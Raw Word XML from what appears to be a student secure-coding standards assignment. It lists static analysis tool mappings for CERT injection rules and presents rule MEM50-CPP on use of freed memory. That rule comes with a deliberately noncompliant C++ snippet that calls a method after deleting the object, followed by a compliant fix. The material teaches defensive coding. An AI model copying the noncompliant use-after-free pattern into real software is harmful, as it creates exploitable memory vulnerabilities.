              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>NNTS.TAINTED</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SV.TAINTED.INJECTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2282C22E" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="6BAB8BED" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0735B684" w14:textId="0C7FF1A0" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId68" w:history="1">
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A78E0A" w14:textId="23653CC7" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6100F64A" w14:textId="7DD953DD" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>108 D, 109 D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF55ADB" w14:textId="1573409F" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="2AA5175C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="441A4C5D" w14:textId="0182C6A4" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId69" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FF07150" w14:textId="110B41DF" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0637E8A0" w14:textId="77EAB5A4" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-STR02-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-STR02-b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-STR02-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E3FE72" w14:textId="024751AD" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Protect against command injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Protect against file name injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Protect against SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C0D58" w14:paraId="3116DC25" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D2ADAE" w14:textId="123D0B62" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId70" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175DCE5F" w14:textId="1EB25898" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27CCCC59" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="00000000" w:rsidP="006C0D58">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId71" w:history="1">
              <w:r w:rsidR="006C0D58">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C: Rec. STR02-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="04C2C431" w14:textId="3AFD705F" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7933D2CA" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D5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542A7BA7" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">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Execution of externally controlled command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD6A1A3" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">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Command executed from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5103E09A" w14:textId="77777777" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">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Library loaded from externally controlled path</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EED4FB0" w14:textId="1CCC4D7D" w:rsidR="006C0D58" w:rsidRDefault="006C0D58" w:rsidP="006C0D58">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rP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8" w:name="_Toc52464063"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5472C67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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B1D880B" w14:textId="68409DBB" w:rsidR="00381847" w:rsidRDefault="00224BF1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MEM</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="000668C4">
              <w:t>050</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="000668C4">
              <w:t>CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="76F8F206" w14:textId="2C2EF1B6" w:rsidR="00381847" w:rsidRDefault="000668C4">
            <w:r w:rsidRPr="000668C4">
              <w:t xml:space="preserve">Do not access </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000668C4">
              <w:t>freed</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000668C4">
              <w:t xml:space="preserve"> memory</w:t>
            </w:r>
            <w:r w:rsidR="007821D9">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="007821D9" w:rsidRPr="007821D9">
              <w:t>Pointers to memory that has been deallocated are called dangling pointers. Accessing a dangling pointer can result in exploitable vulnerabilities.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E7DD32D"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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5389B2C" w:rsidR="00F72634" w:rsidRDefault="00560A49" w:rsidP="00A72503">
            <w:r w:rsidRPr="00560A49">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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F089E0C" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t>#include &lt;new&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A42F58" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB8F58C" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t>struct S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BB0C6A3" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C13FB2" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BB55965" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37334757" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>g(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>noexcept</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(false) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4544B1AB" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  S *s = new </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>S;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7760B786" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  // ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546D77AE" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  delete </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>s;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="06952C8D" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  // ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23DAC4A3" w14:textId="77777777" w:rsidR="00560A49" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t xml:space="preserve">  s-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4D0934" w14:textId="1AB66986" w:rsidR="00F72634" w:rsidRDefault="00560A49" w:rsidP="00560A49">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="358849FC"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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DC9646D" w:rsidR="00F72634" w:rsidRDefault="008C3F10" w:rsidP="00A72503">
            <w:r w:rsidRPr="008C3F10">
              <w:t>In this compliant solution, the dynamically allocated memory is not deallocated until it is no longer required.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="7A1A78A0" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34067E0E" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t>#include &lt;new&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781EA597" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC38F23" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t>struct S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B57002A" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve">  void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63AE2BEA" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD795FD" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A1C68F" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>g(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>noexcept</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(false) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414AFF8A" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve">  S *s = new </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>S;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="753A35AF" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve">  // ...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="552A71A2" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t xml:space="preserve">  s-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585645D1" w14:textId="77777777" w:rsidR="008C3F10" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  delete </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>s;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="681B4B09" w14:textId="00C14755" w:rsidR="00F72634" w:rsidRDefault="008C3F10" w:rsidP="008C3F10">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64928297" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A8CD6B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Int_25wkMzN5"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>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E2C86F2" w14:textId="07555BEA" w:rsidR="002A4332" w:rsidRDefault="00B475A1" w:rsidP="002A4332">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="009A5D3E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002A4332" w:rsidRPr="002A4332">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Heed Compiler Warnings:</w:t>
            </w:r>
            <w:r w:rsidR="002A4332">
              <w:t xml:space="preserve"> Compiler warnings can often indicate potential issues with accessing freed memory. Addressing these warnings can help prevent vulnerabilities related to dangling pointers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DDD77A8" w14:textId="4CEF5885" w:rsidR="00B475A1" w:rsidRDefault="007E34BE" w:rsidP="002A4332">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="001B26B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="002A4332" w:rsidRPr="00927973">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Effective Quality Assurance Techniques:</w:t>
            </w:r>
            <w:r w:rsidR="002A4332">
              <w:t xml:space="preserve"> Effective QA techniques, such as thorough testing and code reviews, can identify issues with dangling pointers early in the development process, ensuring that such vulnerabilities are addressed before the software is deployed.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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
